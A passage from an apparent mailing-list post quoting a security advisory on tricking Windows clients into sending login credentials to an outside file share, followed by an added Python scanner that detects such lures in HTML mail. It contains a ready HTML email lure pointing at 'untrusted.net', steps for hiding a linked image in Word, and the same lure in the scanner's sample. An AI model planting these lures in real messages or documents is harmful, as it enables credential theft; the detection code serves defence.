to set up the guest
account with no password to allow anonymous access to the server. Windows
will always try the cached credentials first. When the cached credentials
fail, a server will silently allow anonymous access and deliver the file.
IE will also take the UNC path format \\untrusted.net\share\pixel.gif.
Netscape (4.05) will not use this format.
Mail based attack:
Since most major mail programs on Windows support HTML email using either
the Netscape or IE engine for display, this same attack can be delivered
by email. An HTML message with the following:
    BODY background=file://untrusted.net/share/pixel.gif bgColor=#ff
    NOSEND="1"
will activate the attack when the user opens or previews the message. The
NOSEND attribute will probably keep Outlook from embedding the file in the
email message. This will ensure that the link is forwarded if the mail is
clever enough to get the initial recipient to forward it.
Obviously the mail-based version has the benefit of being directed at
targets. This has been successfully used during field-testing.
Document based attack:
Links can also be placed in Microsoft Word documents. To do this, open a
Word document, choose Insert:Picture:From File. In the dialog box type the
UNC path for the file name. Check "Link to File" and uncheck "Save with
Document". Word does not accept the file:// URL.
This linking does not require any macros to run. If a small white graphic
is used the viewer will have no idea it is in the document.
Excel does not allow picture embedding in the same way.
Windows 95 downgrading LANMAN authentication:
According to Microsoft TechNet Bulletin Q165403, Windows 95 versions up to
and including OEM SR 2.1 can be tricked into downgrading authentication to
plaintext passwords. There is an update for W95 available. See:
http://support.microsoft.com/support/kb/articles/Q165/4/03.ASP
for details. Without that patch these systems are extremely vulnerable.
Enterprises running W95 should verify their configurations. W98, NT4 sp3
or later and W2K are not vulnerable to plaintext downgrading.
[major snip]
Lawrence Kalmakoff
Ottawa, Ontario
DH/DSS Key ID: 0xA99FCC5F
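As an added example, not part of the original message or of the advisory it quotes: a small Python scanner a mail gateway or incident responder could run over an HTML body to flag auto-fetched references (background, src, href and similar attributes) that point at a file share on a host outside an allow-list. It recognises both forms the post describes, the file:// URL and the UNC path, and ignores local drive paths. The sample message, the host names and the trusted-host list are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Attributes that a mail or web client fetches automatically on display.
# (Assumed list for this example; extend it for the clients you support.)
AUTO_FETCH_ATTRS = {"background", "src", "href", "dynsrc", "lowsrc"}

# \\host\share\...  (UNC path)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# file://host/share/...  (also tolerates extra slashes, e.g. file:////host/share)
FILE_URL_RE = re.compile(r"^file:(?://)?/*([^/\\]+)[/\\]", re.IGNORECASE)
DRIVE_RE = re.compile(r"^[A-Za-z]:$")


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, value) for every auto-fetched attribute."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in AUTO_FETCH_ATTRS:
                self.refs.append((tag.lower(), name.lower(), value.strip()))


def remote_host(value):
    """Return the host a UNC path or file:// URL would contact, else None.

    Local drive references such as file:///C:/x.gif yield None: they do not
    cause an SMB connection and the credential exposure the post describes.
    """
    m = UNC_RE.match(value) or FILE_URL_RE.match(value)
    if not m:
        return None
    host = m.group(1).lower()
    if DRIVE_RE.match(host):
        return None
    return host


def find_smb_lures(html_body, trusted_hosts=()):
    """Return findings for auto-fetched references to untrusted file shares."""
    trusted = {h.lower() for h in trusted_hosts}
    parser = _RefCollector()
    parser.feed(html_body)
    parser.close()
    findings = []
    for tag, attr, value in parser.refs:
        host = remote_host(value)
        if host and host not in trusted:
            findings.append({"tag": tag, "attr": attr, "host": host, "ref": value})
    return findings


# Constructed sample: one message carrying the background-image lure, a 1x1
# image via UNC path, a harmless http image, a local drive path and a link to
# an internal (allow-listed) server.
SAMPLE_MAIL = r"""<html><body background="file://untrusted.net/share/pixel.gif" bgcolor="#ffffff">
<p>Quarterly numbers attached.</p>
<img src="http://www.example.com/logo.gif">
<img src="\\untrusted.net\share\pixel.gif" width=1 height=1>
<img src="file:///C:/temp/local.gif">
<a href="\\fileserver.corp.example\public\doc.doc">internal link</a>
</body></html>"""

if __name__ == "__main__":
    for f in find_smb_lures(SAMPLE_MAIL, trusted_hosts=("fileserver.corp.example",)):
        print(f"{f['tag']}@{f['attr']} -> {f['host']}  ({f['ref']})")
```

Run as a script it reports the two references to untrusted.net and stays quiet about the http image, the local drive path and the allow-listed internal server. The scanner only detects the lure; it does not stop a client that has already rendered the message, so it belongs at the gateway or in triage alongside blocking outbound SMB (TCP 139/445) at the perimeter, which removes the credential exposure regardless of what the message contains.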